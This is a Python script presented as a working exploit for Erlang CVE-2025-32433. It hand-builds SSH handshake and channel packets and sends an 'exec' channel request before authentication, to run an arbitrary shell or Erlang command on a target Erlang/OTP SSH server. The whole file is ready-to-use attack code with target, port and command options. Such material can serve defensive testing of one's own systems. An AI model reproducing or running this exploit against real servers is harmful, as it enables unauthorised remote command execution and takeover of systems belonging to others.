import socket
import struct
import time
import argparse
import base64


# Helper to format SSH string (4-byte length + bytes)
def string_payload(s):
    """Encode *s* as an SSH ``string`` field.

    Wire format (RFC 4251 §5): a big-endian uint32 byte count followed by
    the UTF-8 encoding of *s*.
    """
    encoded = s.encode("utf-8")
    length_prefix = struct.pack(">I", len(encoded))
    return b"".join((length_prefix, encoded))


# Builds SSH_MSG_CHANNEL_OPEN for session
def build_channel_open(channel_id=0):
    """Return an SSH_MSG_CHANNEL_OPEN payload for a "session" channel.

    Layout (RFC 4254 §5.1): message byte 90, string channel type, then three
    big-endian uint32 fields: sender channel, initial window size, and
    maximum packet size.
    """
    msg_type = 0x5A  # SSH_MSG_CHANNEL_OPEN
    initial_window = 0x68000
    max_packet = 0x10000
    trailer = struct.pack(">III", channel_id, initial_window, max_packet)
    return b"".join([bytes([msg_type]), string_payload("session"), trailer])


# Builds SSH_MSG_CHANNEL_REQUEST with 'exec' payload
def build_channel_request(channel_id=0, command=None):
    """Return an SSH_MSG_CHANNEL_REQUEST payload of type "exec".

    Layout (RFC 4254 §6.5): message byte 98, uint32 recipient channel,
    string request type, boolean want_reply (always true here), string
    command.

    NOTE(review): *command* must be a str. The ``None`` default is not
    usable and fails inside ``string_payload``.
    """
    want_reply = True
    fields = [
        bytes([0x62]),  # SSH_MSG_CHANNEL_REQUEST
        struct.pack(">I", channel_id),
        string_payload("exec"),
        struct.pack(">?", want_reply),  # packs True as b"\x01"
        string_payload(command),
    ]
    return b"".join(fields)


# Builds a minimal but valid SSH_MSG_KEXINIT packet
def build_kexinit():
    """Return an SSH_MSG_KEXINIT payload (RFC 4253 §7.1).

    The 16-byte cookie is all zeros. For each category the protocol defines
    as a client->server / server->client pair, the same name-list is sent
    for both directions. The payload ends with first_kex_packet_follows =
    FALSE and a reserved uint32 of 0.
    """
    def encode_names(names):
        # An SSH name-list is a comma-joined string field.
        return string_payload(",".join(names))

    # Presumably chosen to overlap with what the target server offers
    # (the original comment refers to a server log not shown here).
    kex_algorithms = [
        "curve25519-sha256",
        "ecdh-sha2-nistp256",
        "diffie-hellman-group-exchange-sha256",
        "diffie-hellman-group14-sha256",
    ]
    host_key_algorithms = ["rsa-sha2-256", "rsa-sha2-512"]

    fields = [
        bytes([20]),  # SSH_MSG_KEXINIT
        bytes(16),  # cookie
        encode_names(kex_algorithms),
        encode_names(host_key_algorithms),
    ]
    # Directional pairs, in order: encryption, MAC, compression, languages.
    for names in (["aes128-ctr"], ["hmac-sha1"], ["none"], []):
        encoded = encode_names(names)
        fields.extend((encoded, encoded))
    fields.append(b"\x00")  # first_kex_packet_follows = FALSE
    fields.append(struct.pack(">I", 0))  # reserved
    return b"".join(fields)


# Wraps a payload in SSH binary-packet framing (length, padding length, payload, padding)
def pad_packet(payload, block_size=8):
    """Wrap *payload* in unencrypted SSH binary-packet framing (RFC 4253 §6).

    Output: uint32 packet_length, byte padding_length, payload, then
    padding_length zero bytes. Padding is chosen so the whole packet is a
    multiple of *block_size*. If that would leave fewer than 4 padding
    bytes, one extra block is added.
    """
    # 5 = 4-byte packet_length field + 1-byte padding_length field.
    pad = block_size - (len(payload) + 5) % block_size
    pad = pad + block_size if pad < 4 else pad
    packet_length = 1 + len(payload) + pad
    return b"".join(
        (struct.pack(">I", packet_length), bytes([pad]), payload, bytes(pad))
    )


# Convert system command to Erlang os:cmd format
def format_erlang_command(cmd):
    """Wrap shell command *cmd* in an Erlang ``os:cmd/1`` expression.

    The command is UTF-8 encoded and base64'd, so quotes and other special
    characters need no Erlang escaping. The expression decodes it at run
    time and passes the resulting charlist to ``os:cmd``.
    """
    b64_text = base64.b64encode(cmd.encode("utf-8")).decode()
    template = 'os:cmd(binary_to_list(base64:decode("{}"))).'
    return template.format(b64_text)


# === Exploit flow ===
def main():
    """Parse CLI arguments, then send the channel-request sequence to the target.

    On one TCP connection this sends, in order: a version banner,
    SSH_MSG_KEXINIT, SSH_MSG_CHANNEL_OPEN and SSH_MSG_CHANNEL_REQUEST
    ("exec"). No further key-exchange or authentication messages are sent
    in between. If both --erlang and --command are given, --erlang wins.
    With neither, the help text is printed and nothing is sent. Any error
    is caught and reported on stdout rather than raised.
    """
    # Parse command line arguments
    parser = argparse.ArgumentParser(description='Exploit for Erlang CVE-2025-32433')
    parser.add_argument('-t', '--target', default="127.0.0.1", help='Target IP address (default: 127.0.0.1)')
    parser.add_argument('-p', '--port', type=int, default=2222, help='Target port (default: 2222)')
    parser.add_argument('-c', '--command', help='System command to execute (for example: touch /tmp/success)')
    parser.add_argument('-e', '--erlang', help='Interpret command as raw Erlang code instead of system command. (for example: os:cmd("touch /tmp/success").)')
    args = parser.parse_args()

    # Convert system command to Erlang command unless --erlang flag is used
    if args.erlang:
        erlang_cmd = args.erlang
    elif args.command:
        erlang_cmd = format_erlang_command(args.command)
    else:
        # print_help() writes to stdout itself and returns None. Wrapping it
        # in print() used to emit a stray "None" line after the help text.
        parser.print_help()
        return

    try:
        # Announce before connecting, so a connect timeout or refusal is
        # reported after this line instead of silently preceding it.
        print("[*] Connecting to SSH server...")
        with socket.create_connection((args.target, args.port), timeout=5) as s:
            # 1. Banner exchange
            s.sendall(b"SSH-2.0-OpenSSH_8.9\r\n")
            banner = s.recv(1024)
            print(f"[+] Received banner: {banner.strip().decode(errors='ignore')}")
            time.sleep(0.5)  # Small delay between packets

            # 2. Send SSH_MSG_KEXINIT
            print("[*] Sending SSH_MSG_KEXINIT...")
            kex_packet = build_kexinit()
            s.sendall(pad_packet(kex_packet))
            time.sleep(0.5)  # Small delay between packets

            # 3. Send SSH_MSG_CHANNEL_OPEN
            print("[*] Sending SSH_MSG_CHANNEL_OPEN...")
            chan_open = build_channel_open()
            s.sendall(pad_packet(chan_open))
            time.sleep(0.5)  # Small delay between packets

            # 4. Send SSH_MSG_CHANNEL_REQUEST (pre-auth!)
            print("[*] Sending SSH_MSG_CHANNEL_REQUEST (pre-auth)...")
            print(f"[*] Erlang payload: {erlang_cmd}")
            chan_req = build_channel_request(command=erlang_cmd)
            s.sendall(pad_packet(chan_req))

            # Only delivery is known at this point. This client never observes
            # whether the target actually ran anything, so don't claim it did.
            print("[✓] Exploit sent (command execution is not confirmed by this client)")

            # Try to receive any response (might get a protocol error or disconnect)
            try:
                response = s.recv(1024)
                print(f"[+] Received response: {response.hex()}")
            except socket.timeout:
                print("[*] No response within timeout period (which is expected)")

    except Exception as e:
        # Top-level CLI boundary: report rather than dump a traceback.
        print(f"[!] Error: {e}")


# Run the CLI only when the file is executed as a script, not when imported.
if __name__ == "__main__":
    main()
